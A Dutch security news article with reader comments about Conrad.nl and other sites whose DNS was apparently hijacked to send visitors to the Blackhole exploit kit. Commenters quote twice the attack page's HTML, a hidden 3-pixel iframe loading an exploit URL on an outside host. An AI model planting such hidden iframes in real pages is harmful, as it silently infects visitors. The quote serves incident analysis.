Conrad ontkent malware op website *update 2*
Volgens verschillende beveiligingsonderzoekers zijn aanvallers erin geslaagd om malware op de website van elektronicawinkel Conrad te plaatsen, maar het bedrijf ontkent dit. Beveiligingsonderzoeker Yonathan Klijnsma liet vanochtend weten dat de frontpage van conrad.nl bezoekers naar de Blackhole exploit-kit doorstuurde. Deze exploit-kit infecteert bezoekers met onveilige software.
Het gaat dan om software zoals Adobe Reader, Java en Adobe Flash Player die niet door internetgebruikers zijn gepatcht. Ook beveiligingsbedrijf SurfRight bevestigt dat er malware op het domein aanwezig is.
De malware die via de website zou worden verspreidt wordt door 4 van de 45 virusscanners op VirusTotal herkend, zo laat de IT-beveiliger via Twitter weten. De malware zou vanaf de besmette computer een verbinding met het anonimiseringsnetwerk Tor opzetten, aldus Klijnsma, die voor Fox-IT werkt.
Reactie
Ook de website urlquery.net laat zien dat er malware via het domein wordt verspreid. Conrad ontkent echter dat website malware zou verspreiden. "@ydklijnsma Daar is geen sprake van. Er is een storing op DNS-server bij provider. Er wordt hard aan gewerkt om op te lossen."
Ook in een nieuwe tweet stelt de elektronicawinkel dat er een storing bij de provider is. Inmiddels zegt de website 'Site Under construction' en staat daar inderdaad een iframe die naar een aanvalspagina wijst.
Update 11:40
Het lijkt inderdaad om een DNS-probleem te gaan. Klijnsma meldt via Twitter dat de DNS van provider Webstekker is aangepast waardoor niet alleen het domein van Conrad, maar ook andere websites naar malware wijzen.
Update 2: 12:35
Conrad laat via Twitter weten dat het van de provider te horen kreeg dat het vannacht met een storing aan de DNS-omgeving te maken heeft gekregen. "Vannacht zijn aantal zones geüpdatet met verkeerde IP informatie. Vanochtend hersteld en SIDN heeft zones rond 08:00 uur geüpdatet. Correctie vond snel plaats maar effect niet overal snel zichtbaar. Kan soms enkele uren duren voor alle websites worden weergegeven."
https://twitter.com/ydklijnsma/status/364305909092073473
De reactie van Conrad raakt kant noch wal. Het is geen storing en het lijkt niets te maken te hebben met DNS. Dan zou de hele website gekopieerd moeten zijn, want die krijg ik gewoon in beeld.
In de pagina staat een verwijzing:
En die linkt vervolgens door naar de malware
<head>
<title>Site Under construction</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<iframe src="http://cona.com/removal/stops-followed-forces.php" style="width:3px;height:3px;border:0px"></iframe>
</body>
</html>
Ik zie hier niet in terug hoe het met DNS te maken kan hebben. (tenzij heel media.conrad.nl verwijst naar een server die niet behoort te bestaan)
Ik weet welke server zij normaliter gebruiken. Nu gaat de DNS naar een server in Ierland.
In de pagina staat een verwijzing:
En die linkt vervolgens door naar de malware
<head>
<title>Site Under construction</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<iframe src="http://cona.com/removal/stops-followed-forces.php" style="width:3px;height:3px;border:0px"></iframe>
</body>
</html>
Ik zie hier niet in terug hoe het met DNS te maken kan hebben. (tenzij heel media.conrad.nl verwijst naar een server die niet behoort te bestaan)
als de dns gehacked is, en media.conrad.nl wordt doorverwezen naar een malware site, dan kan dat toch? die iFrame zal er wel om een andere reden al in hebben gezeten. Aan de naam te zien, om af en toe een survey af tenemen bij bezoekers.
Die dns-server geeft voor alle queries (en dus alle domeinen die normaal in ns1.dn-s.nl staan) zijn eigen ip terug, zodat alle sites op de webserver op dit ip uitkomen. Die webserver geeft een lege pagina terug met als kop 'Website under construction', maar heeft een verborgen iframe die naar de exploit verwijst.
Omdat de 'valse' nameservers alle queries teruggaf met een TTL van 60000 of meer, kan het zomaar tot 20 uur duren voordat de verkeerde info uit de caches van andere nameservers zijn verdwenen en alles weer normaal is.
dus weten we nu in ieder geval dat AcidBurn het ook wel eens mis kan hebben. Tip: alleen "zeker weten" roepen als je het ook echt zeker weet :)
Peter
Meerdere bedrijven onder het it-ernity bedrijf hebben last van een 'dns storing'.
Die iframe is niet vriendelijk. Heb ik de helpdesk van vdx toch moeten wijzen op het feit dat het niet verstandig is om klanten naar de noc / update pagina te laten kijken voor de laatste updates, terwijl die host ook de "Site Under construction" iframe aan het serveren was...
Nou even kijken of ze (it-ernity dochters) zo open zijn om hier de juiste root cause te openbaren.
Ken iemand de werking nader toelichten? Ik heb onlangs één van de websites bezocht met de laatste versie van Firefox op Windows 7 x64, met de laatste flash player.
Zou ik ook slachtoffer van deze malware kunnen zijn?
De eerste reacties van mij zijn daarom verwijderd. Mijn excuses hiervoor.
Ik heb overigens wel de site bezocht, maar omdat standaard iFrames worden geblokkeerd (dan kan via NoScript in Firefox of ScriptSafe in Google webbrowser) is er - na controle - geen infectie opgetreden.
Ken iemand de werking nader toelichten? Ik heb onlangs één van de websites bezocht met de laatste versie van Firefox op Windows 7 x64, met de laatste flash player.
Zou ik ook slachtoffer van deze malware kunnen zijn?
Hoezo ? Mensen met gezond verstand zullen op basis van zo'n bericht de website niet bezoeken. De vraag of je beschikt over gezond verstand is niet de verantwoordelijkheid van de redactie.
Op een website als www.security.nl zou je er toch vanuit moeten kunnen gaan dat mensen nadenken voordat ze een met malware besmette website bezoeken.
Ik heb dit soort artikelen *graag* hier, zodat ik op mijn werk deze website tijdelijk kan blokken op onze proxy. En ik zal niet de enige hier zijn die dergelijke informatie constructief gebruikt.
Mensen die zichzelf besmetten met malware door besmette websites bewust te bezoeken horen niet op security.nl thuis :)
dus weten we nu in ieder geval dat AcidBurn het ook wel eens mis kan hebben. Tip: alleen "zeker weten" roepen als je het ook echt zeker weet :)
Deze posting is gelocked. Reageren is niet meer mogelijk.
Toezichthouder informatiebeveiliging Overheid
Rijksinspectie Digitale Infrastructuur (RDI)
Vind je het leuk om als toezichthouder bij te dragen aan de verdere groei in informatie-beveiliging van de overheid en in contact te staan met (belangen) organisaties binnen de overheid? Dan kun je komen bouwen aan toezicht op een veilige en betrouwbare Digitale Infrastructuur in Nederland.
Adviseur Informatiebeveiliging
Je bent een belangrijke speler om invulling te geven aan de gemeentelijke ambities op het gebied van informatiebeveiliging. Deze ambities neem jij op in het Informatie-beveiligingsbeleid Gemeente Zoetermeer. Wil je helpen bij het verbeteren van de informatiebeveiliging in Zoetermeer en het versterken van het cyberbewustzijn binnen onze organisatie? Wacht dan niet en kom ons team informatiebeveiliging versterken!
Digital Designer
Ben jij een Grafisch vormgever, UI-designer, Game-artist of gewoon een ‘self-proclaimed creative genius’, die op zoek is naar een leuke en uitdagende baan waarin je al je creativiteit kwijt kan?Je werkt samen met onze developers en UI/UX-designer aan onze Gamified Cybersecurity Challenges welke jij voorziet van de mooiste designs.
Senior Full Stack Developer
Als full stack developer bij Certified Secure maak je de mooiste cybersecurity challenges die onze deelnemers wereldwijd uitdagen en inspireren. Alle challenges zijn gebaseerd op actuele kwetsbaarheden, je komt dus telkens nieuwe technieken tegen, van machine learning tot web assembly, van Swift UI tot GCP.